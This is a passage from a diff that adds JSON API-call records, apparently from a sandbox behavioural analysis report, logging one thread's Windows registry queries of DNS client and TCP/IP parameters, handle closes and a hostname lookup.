"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationMaxAddressCount" + } + ], + "repeated": 0, + "id": 522 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "ValueName", + "value": "MaxNumberOfAddressesToRegister" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\MaxNumberOfAddressesToRegister" + } + ], + "repeated": 0, + "id": 523 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "UpdateSecurityLevel" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateSecurityLevel" + } + ], + "repeated": 0, + "id": 524 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "ValueName", + "value": "UpdateSecurityLevel" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UpdateSecurityLevel" + } + ], + "repeated": 0, + "id": 525 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "UpdateTopLevelDomainZones" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateTopLevelDomainZones" + } + ], + "repeated": 0, + "id": 526 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "DowncaseSpnCauseApiOwnerIsTooLazy" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DowncaseSpnCauseApiOwnerIsTooLazy" + } + ], + "repeated": 0, + "id": 527 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "RegistrationOverwrite" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationOverwrite" + } + ], + "repeated": 0, + "id": 528 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "MaxCacheSize" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheSize" + } + ], + "repeated": 0, + "id": 529 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "MaxCacheTtl" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheTtl" + } + ], + "repeated": 0, + "id": 530 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "MaxNegativeCacheTtl" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxNegativeCacheTtl" + } + ], + "repeated": 0, + "id": 531 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "AdapterTimeoutLimit" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AdapterTimeoutLimit" + } + ], + "repeated": 0, + "id": 532 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "ServerPriorityTimeLimit" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ServerPriorityTimeLimit" + } + ], + "repeated": 0, + "id": 533 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "MaxCachedSockets" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCachedSockets" + } + ], + "repeated": 0, + "id": 534 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "DisableServerUnreachability" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableServerUnreachability" + } + ], + "repeated": 0, + "id": 535 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "EnableMulticast" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMulticast" + } + ], + "repeated": 0, + "id": 536 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "MulticastResponderFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastResponderFlags" + } + ], + "repeated": 0, + "id": 537 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "MulticastSenderFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderFlags" + } + ], + "repeated": 0, + "id": 538 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "MulticastSenderMaxTimeout" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderMaxTimeout" + } + ], + "repeated": 0, + "id": 539 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "EnableMDNS" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMDNS" + } + ], + "repeated": 0, + "id": 540 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "DnsTest" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsTest" + } + ], + "repeated": 0, + "id": 541 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "UseCompartments" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseCompartments" + } + ], + "repeated": 0, + "id": 542 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "CacheAllCompartments" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\CacheAllCompartments" + } + ], + "repeated": 0, + "id": 543 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "UseNewRegistration" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseNewRegistration" + } + ], + "repeated": 0, + "id": 544 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "ResolverRegistration" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistration" + } + ], + "repeated": 0, + "id": 545 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "ResolverRegistrationOnly" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistrationOnly" + } + ], + "repeated": 0, + "id": 546 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "NewDhcpSrvRegistration" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\NewDhcpSrvRegistration" + } + ], + "repeated": 0, + "id": 547 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "DirectAccessPreferLocal" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DirectAccessPreferLocal" + } + ], + "repeated": 0, + "id": 548 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "DisableIdnEncoding" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableIdnEncoding" + } + ], + "repeated": 0, + "id": 549 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "EnableIdnMapping" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableIdnMapping" + } + ], + "repeated": 0, + "id": 550 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "ShortnameProxyDefault" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ShortnameProxyDefault" + } + ], + "repeated": 0, + "id": 551 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "DisableNRPTForAdapterRegistration" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableNRPTForAdapterRegistration" + } + ], + "repeated": 0, + "id": 552 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "TestMode_AdaptiveTimeoutHistoryLength" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutHistoryLength" + } + ], + "repeated": 0, + "id": 553 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "TestMode_AdaptiveTimeoutRecalculationInterval" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutRecalculationInterval" + } + ], + "repeated": 0, + "id": 554 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "DnsQueryTimeouts" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQueryTimeouts" + } + ], + "repeated": 0, + "id": 555 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "ValueName", + "value": "DnsQueryTimeouts" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQueryTimeouts" + } + ], + "repeated": 0, + "id": 556 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "DnsQuickQueryTimeouts" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQuickQueryTimeouts" + } + ], + "repeated": 0, + "id": 557 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "ValueName", + "value": "DnsQuickQueryTimeouts" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQuickQueryTimeouts" + } + ], + "repeated": 0, + "id": 558 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ae44b", + "parentcaller": "0x7363b206", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000420" + } + ], + "repeated": 0, + "id": 559 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ae44b", + "parentcaller": "0x7363b215", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000041c" + } + ], + "repeated": 0, + "id": 560 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 561 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "System\\CurrentControlSet\\Services\\Tcpip\\Parameters" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" + }, + { + "name": "Class", + "value": "Class" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 562 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 563 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters" + } + ], + "repeated": 0, + "id": 564 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 565 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\Windows NT\\DnsClient" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\DnsClient" + } + ], + "repeated": 0, + "id": 566 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "Hostname" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname" + } + ], + "repeated": 0, + "id": 567 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "Hostname" + }, + { + "name": "Type", + "value": "1", + "pretty_value": "REG_SZ" + }, + { + "name": "Information", + "value": "DESKTOP-JNJQ8PL" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname" + } + ], + "repeated": 0, + "id": 568 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ae44b", + "parentcaller": "0x7363b206", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000041c" + } + ], + "repeated": 0, + "id": 569 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ae44b", + "parentcaller": "0x7363b215", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000420" + } + ], + "repeated": 0, + "id": 570 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 571 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "System\\CurrentControlSet\\Services\\Tcpip\\Parameters" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" + }, + { + "name": "Class", + "value": "Class" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + 